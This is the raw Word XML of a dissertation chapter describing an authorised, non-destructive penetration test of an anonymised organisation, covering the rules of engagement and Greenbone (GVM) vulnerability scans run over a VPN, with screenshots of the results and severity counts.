    <w:p w14:paraId="46A1E4F9" w14:textId="4F51BA5F" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="299" w:name="_Toc113190749"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CHAPTER 5: EXPERIMENT</w:t>
      </w:r>
      <w:r w:rsidR="00807B57">
        <w:t>S &amp; RESULTS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="299"/>
    </w:p>
    <w:p w14:paraId="4BDA0AE2" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="300" w:name="_Toc113190750"/>
      <w:r w:rsidRPr="00936117">
        <w:t>5.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00936117">
        <w:tab/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="300"/>
    </w:p>
    <w:p w14:paraId="06E0658F" w14:textId="07478783" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The prerequisite steps that were outlined in chapter 4 have now been completed and chapter 5 will set out the experiments. The first is to mutually agree the rules of engagement between the organisation and the author. The second is to run the GVM via the VPN and ascertain what, if any, vulnerabilities are reported. Once the reports have been given to the organisation, the third will be to research any vulnerabilities and plan various attack methodologies. Lastly a report will be made and given to </w:t>
      </w:r>
      <w:r w:rsidR="00BC61F9">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>rganisation</w:t>
      </w:r>
      <w:r w:rsidR="00BC61F9">
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so that they can mitigate the risks to their network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A4D02D" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="004C7AD4" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="301" w:name="_Toc113190751"/>
      <w:r w:rsidRPr="004C7AD4">
        <w:t>5.2</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7AD4">
        <w:tab/>
        <w:t>Rules of Engagement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="301"/>
    </w:p>
    <w:p w14:paraId="72D33526" w14:textId="78AAAA12" w:rsidR="00DF42B8" w:rsidRPr="004C7AD4" w:rsidRDefault="21523073" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="004C7AD4">
        <w:t xml:space="preserve">Pre-engagement definition of the scope is </w:t>
      </w:r>
      <w:bookmarkStart w:id="302" w:name="_Int_cpSBZqZb"/>
      <w:r w:rsidRPr="004C7AD4">
        <w:t>arguably the</w:t>
      </w:r>
      <w:bookmarkEnd w:id="302"/>
      <w:r w:rsidRPr="004C7AD4">
        <w:t xml:space="preserve"> most </w:t>
      </w:r>
      <w:bookmarkStart w:id="303" w:name="_Int_NjiCJWGk"/>
      <w:r w:rsidRPr="004C7AD4">
        <w:t>crucial step</w:t>
      </w:r>
      <w:bookmarkEnd w:id="303"/>
      <w:r w:rsidRPr="004C7AD4">
        <w:t xml:space="preserve"> as it defines what areas are to be tested, how the test will be conducted, the timeline for the work ie. start and end dates. The targets must be identified, Internet Protocol (IP) address ranges and domains must be specified </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="247833010"/>
          <w:placeholder>
            <w:docPart w:val="35708180EB364F1AB30F61C866E192B5"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[15]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="004C7AD4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAAD4BD" w14:textId="7CC03716" w:rsidR="00DF42B8" w:rsidRPr="004C7AD4" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="004C7AD4">
        <w:t>Written consent / authorization and scope has been obtained between UWTSD, expressly setting out my authorisation to conduct the experiments, and Organisation</w:t>
      </w:r>
      <w:r w:rsidR="00BC61F9" w:rsidRPr="004C7AD4">
        <w:t> A</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7AD4">
        <w:t>. The scope is that no destructive tests may be carried out on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B019B8" w14:textId="6A946FBE" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="004C7AD4">
        <w:t>The connection details to access the organisation’s FortiClient VPN together with the identified IP address targets were sent via encryption to the author.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D7977D" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ADB629C" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2BCEC6" w14:textId="3D6D9E41" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The timeline for conducting phase 1 was identified as the bank holiday weekend of 3-5 June with the reports being presented to </w:t>
      </w:r>
      <w:r w:rsidR="00BC61F9">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rganisation </w:t>
      </w:r>
      <w:r w:rsidR="00BC61F9">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:t>by 11 June</w:t>
      </w:r>
      <w:r w:rsidR="00BC61F9">
        <w:t xml:space="preserve"> 2022</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA86D60" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Phase 2 research will start immediately, as the penetration tests must be completed by 17 July 2022. This will allow time for the write up and analysis to be conducted on completion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68FF98" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00115BDD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="304" w:name="_Toc113190752"/>
      <w:r>
        <w:t>PHASE 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="304"/>
    </w:p>
    <w:p w14:paraId="662261E1" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="305" w:name="_Toc113190753"/>
      <w:r>
        <w:t>5.3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Run GVM via the VPN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="305"/>
    </w:p>
    <w:p w14:paraId="5011D1A6" w14:textId="224309B3" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So that the network was disrupted as little as possible the scan took place over a bank holiday weekend. Figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00C8706B">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> illustrates the first task that was run against xxx.xxx.xxx.0/24 and the web address was the local host using port 9392.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4B022" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A7B817E" wp14:editId="2F23819C">
            <wp:extent cx="6335090" cy="3949430"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="294847903" name="Picture 29484790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847903" name="Picture 294847903" descr="Graphical user interface, website&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId84"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6354196" cy="3961341"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0705F899" w14:textId="57EA8178" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="306" w:name="_Toc111363630"/>
      <w:bookmarkStart w:id="307" w:name="_Toc111363767"/>
      <w:bookmarkStart w:id="308" w:name="_Toc111981793"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>68</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: First Scan with GVM against xxx.xxx.xxx.0/24</w:t>
      </w:r>
      <w:bookmarkEnd w:id="306"/>
      <w:bookmarkEnd w:id="307"/>
      <w:bookmarkEnd w:id="308"/>
    </w:p>
    <w:p w14:paraId="0B1EBCCF" w14:textId="6F43921A" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E48F558" w14:textId="77777777" w:rsidR="00C8706B" w:rsidRDefault="00C8706B" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73DF5D49" w14:textId="741F4915" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00C8706B">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> details the start of the process with 1% of the scan started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0AB261" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251459584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0030186A" wp14:editId="50254CB6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2078050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3420649</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="104215" cy="283781"/>
                <wp:effectExtent l="38100" t="0" r="29210" b="59690"/>
                <wp:wrapNone/>
                <wp:docPr id="242" name="Straight Arrow Connector 242"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="104215" cy="28378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8012C3" id="Straight Arrow Connector 242" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:163.65pt;margin-top:269.35pt;width:8.2pt;height:22.35pt;flip:x;z-index:25145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" strokecolor="#4472c4 [3204]" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="001B6ED4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251467776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41FCB06B" wp14:editId="1608D9FB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2202856</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2527016</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1695450" cy="1133475"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
            <wp:wrapNone/>
            <wp:docPr id="241" name="Picture 24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Picture 241" descr="Graphical user interface&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1695450" cy="1133475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C9F353E" wp14:editId="32CA7B2B">
            <wp:extent cx="5402580" cy="4316283"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="27305"/>
            <wp:docPr id="208" name="Picture 20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Picture 208" descr="Graphical user interface&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId86"/>
                    <a:srcRect l="714" t="18947" r="1889" b="895"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5444888" cy="4350084"/>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46A0CA1" w14:textId="323315FD" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="309" w:name="_Toc111363631"/>
      <w:bookmarkStart w:id="310" w:name="_Toc111363768"/>
      <w:bookmarkStart w:id="311" w:name="_Toc111981794"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>69</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: GVM Scan at 1%</w:t>
      </w:r>
      <w:bookmarkEnd w:id="309"/>
      <w:bookmarkEnd w:id="310"/>
      <w:bookmarkEnd w:id="311"/>
    </w:p>
    <w:p w14:paraId="33734AB7" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69061A3B" w14:textId="6B682F26" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A list of the most severe CVEs is attached in Appendix </w:t>
      </w:r>
      <w:r w:rsidR="002A43D0">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F0DCEA" w14:textId="7517FF77" w:rsidR="001D44DF" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:sectPr w:rsidR="001D44DF">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00C8706B">
        <w:t>70</w:t>
      </w:r>
      <w:r w:rsidR="00723DF3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">demonstrates the scan on 192.168.1.0 at 99% complete together with an earlier scan completed against xxx.xxx.xxx.x/24 with a severity threat level at 7.5 out of 10. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE6FBD1" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00B77DD1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CE3ECFA" wp14:editId="1CFE6578">
            <wp:extent cx="9215318" cy="4843896"/>
            <wp:effectExtent l="19050" t="19050" r="24130" b="13970"/>
            <wp:docPr id="216" name="Picture 216"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Picture 216" descr="Graphical user interface, website&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId87"/>
                    <a:srcRect l="884" t="28797" r="13331" b="1654"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="9291274" cy="4883821"/>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5A572F15" w14:textId="50007698" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="312" w:name="_Toc111363632"/>
      <w:bookmarkStart w:id="313" w:name="_Toc111363769"/>
      <w:bookmarkStart w:id="314" w:name="_Toc111981795"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>70</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: 99% of scan completed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="312"/>
      <w:bookmarkEnd w:id="313"/>
      <w:bookmarkEnd w:id="314"/>
    </w:p>
    <w:p w14:paraId="5DB60E45" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00FF39D1" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF42A16" w14:textId="77777777" w:rsidR="001D44DF" w:rsidRDefault="001D44DF" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27878759" w14:textId="77777777" w:rsidR="001D44DF" w:rsidRDefault="001D44DF" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D11307" w14:textId="77777777" w:rsidR="00B77DD1" w:rsidRDefault="00B77DD1" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4224E58E" w14:textId="7861B82D" w:rsidR="00DF42B8" w:rsidRDefault="00C77CD7" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t>In total 14 tasks were run against the target IP addresses</w:t>
      </w:r>
      <w:r w:rsidR="008D7F6F">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00723DF3">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="008D7F6F">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t xml:space="preserve">sets out the vulnerabilities by </w:t>
      </w:r>
      <w:r w:rsidR="008D7F6F">
        <w:t>severity level</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539199D2" w14:textId="539F2153" w:rsidR="00DF42B8" w:rsidRDefault="00C77CD7" w:rsidP="00C77CD7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251908096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1ACE444C" wp14:editId="1F01F12E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1965614</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5401599</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7323859" cy="415174"/>
                <wp:effectExtent l="19050" t="19050" r="10795" b="23495"/>
                <wp:wrapNone/>
                <wp:docPr id="760259178" name="Rectangle 760259178"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7323859" cy="415174"/>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CBA168" id="Rectangle 760259178" o:spid="_x0000_s1026" style="position:absolute;margin-left:154.75pt;margin-top:425.3pt;width:576.7pt;height:32.7pt;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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008D7F6F" w:rsidRPr="008D7F6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EB08C3B" wp14:editId="778F03D0">
            <wp:extent cx="9000565" cy="6021764"/>
            <wp:effectExtent l="19050" t="19050" r="10160" b="17145"/>
            <wp:docPr id="760259177" name="Picture 760259177" descr="A picture containing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77" name="Picture 760259177" descr="A picture containing Word&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="9018557" cy="6033801"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C6F272" w14:textId="23EE5712" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00C77CD7">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="315" w:name="_Toc111363634"/>
      <w:bookmarkStart w:id="316" w:name="_Toc111363771"/>
      <w:bookmarkStart w:id="317" w:name="_Toc111981796"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>71</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Vulnerabilities </w:t>
      </w:r>
      <w:bookmarkEnd w:id="315"/>
      <w:bookmarkEnd w:id="316"/>
      <w:r w:rsidR="008D7F6F">
        <w:t>by Severity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="317"/>
    </w:p>
    <w:p w14:paraId="7AB554EF" w14:textId="77777777" w:rsidR="001D44DF" w:rsidRDefault="001D44DF" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:sectPr w:rsidR="001D44DF" w:rsidSect="00B77DD1">
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
          <w:pgMar w:top="567" w:right="720" w:bottom="567" w:left="720" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD7D5DD" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
